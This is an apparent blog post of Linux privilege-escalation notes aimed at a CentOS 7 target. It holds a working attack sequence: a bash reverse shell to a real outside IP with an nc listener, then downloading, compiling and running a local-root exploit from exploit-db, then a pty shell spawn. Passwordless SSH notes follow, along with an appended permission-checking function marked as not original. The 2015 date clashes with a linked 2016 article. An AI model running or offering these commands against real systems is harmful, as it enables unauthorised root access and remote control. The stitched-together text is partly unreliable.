Linux Privilege Escalation

Posted on Fri 27 February 2015 in misc

Struts2 vulnerabilities: http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

Java deserialization vulnerability: https://blog.chaitin.com/2015-11-11_java_unserialize_rce/?from=timeline&isappinstalled=0

Getting the operating system version

Getting the distribution release

• cat /etc/issue
• cat /etc/*-release
• cat /etc/lsb-release
• cat /etc/redhat-release

CentOS Linux release 7.0.1406 (Core)

Getting the kernel version

• cat /proc/version
• uname -a
• uname -mrs
• rpm -q kernel
• dmesg | grep Linux
• ls /boot | grep vmlinuz

Linux version 3.10.0-123.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) ) #1 SMP Mon Jun 30 12:09:22 UTC 2014

Searching for exploits

• http://www.exploit-db.com
• http://1337day.com
• http://www.securiteam.com
• http://www.securityfocus.com
• http://www.exploitsearch.net
• http://metasploit.com/modules/
• http://securityreason.com
• http://seclists.org/fulldisclosure/
• http://www.google.com

http://www.exploit-db.com is blocked (by the firewall in China)
Search keywords: **CentOS 7 local root**


https://www.exploit-db.com/download/35370

On the local machine:

```bash
nc -l 8088
```

On the target machine:

```bash
/bin/bash -i >& /dev/tcp/115.159.101.141/8088 0<&1
```

Download exp.c

```bash
cd /tmp
curl https://www.exploit-db.com/download/35370 > exp.c
```

Compile exp.c with gcc

```bash
gcc exp.c -o exploit -lpthread
```

```bash
./exploit
```

Press Enter, then check the result with `id`.

Interactive bash

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```

Passwordless SSH login

Host A logs into host B without a password

  • On A, generate a key pair: ssh-keygen -t rsa
    • ~/.ssh/id_rsa (private key)
    • ~/.ssh/id_rsa.pub (public key)
  • Copy the contents of ~/.ssh/id_rsa.pub into ~/.ssh/authorized_keys on B

Notes

  • On B, the ~/.ssh/ directory must have mode 700
    • chmod 700 .ssh
  • On B, the ~/.ssh/authorized_keys file must have mode 600
    • chmod 600 .ssh/authorized_keys
  • Both must be owned by the current user, otherwise sshd (with StrictModes) ignores the key
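An added check for the three rules above (not from the original post): a POSIX shell function that reports whether the `.ssh` directory and `authorized_keys` have the expected modes and owner and returns the number of problems found. It assumes GNU coreutils `stat -c` (Linux); the directory path and the helper name are my own.

```shell
#!/bin/sh
# check_ssh_perms [DIR]
# Verify the permission and ownership rules sshd enforces for key-based
# login: DIR mode 700, DIR/authorized_keys mode 600, both owned by the
# invoking user. Prints each problem found and returns the problem count
# (0 means the setup is acceptable).
# Assumption: GNU `stat -c` (Linux). On BSD/macOS use `stat -f '%Lp %Su'`.
check_ssh_perms() {
    dir="${1:-$HOME/.ssh}"
    keys="$dir/authorized_keys"
    me="$(id -un)"
    problems=0

    if [ ! -d "$dir" ]; then
        echo "missing directory: $dir"
        return 1
    fi

    # Directory: octal mode and owner name
    set -- $(stat -c '%a %U' "$dir")
    if [ "$1" != "700" ]; then
        echo "$dir: mode $1, expected 700 (chmod 700 \"$dir\")"
        problems=$((problems + 1))
    fi
    if [ "$2" != "$me" ]; then
        echo "$dir: owned by $2, expected $me"
        problems=$((problems + 1))
    fi

    # authorized_keys: must exist, mode 600, same owner
    if [ -f "$keys" ]; then
        set -- $(stat -c '%a %U' "$keys")
        if [ "$1" != "600" ]; then
            echo "$keys: mode $1, expected 600 (chmod 600 \"$keys\")"
            problems=$((problems + 1))
        fi
        if [ "$2" != "$me" ]; then
            echo "$keys: owned by $2, expected $me"
            problems=$((problems + 1))
        fi
    else
        echo "$keys: not found (key login is not configured)"
        problems=$((problems + 1))
    fi
    return "$problems"
}
```

Run `check_ssh_perms ~/.ssh` on host B after copying the public key; a non-zero exit status lists exactly which chmod or chown is still missing.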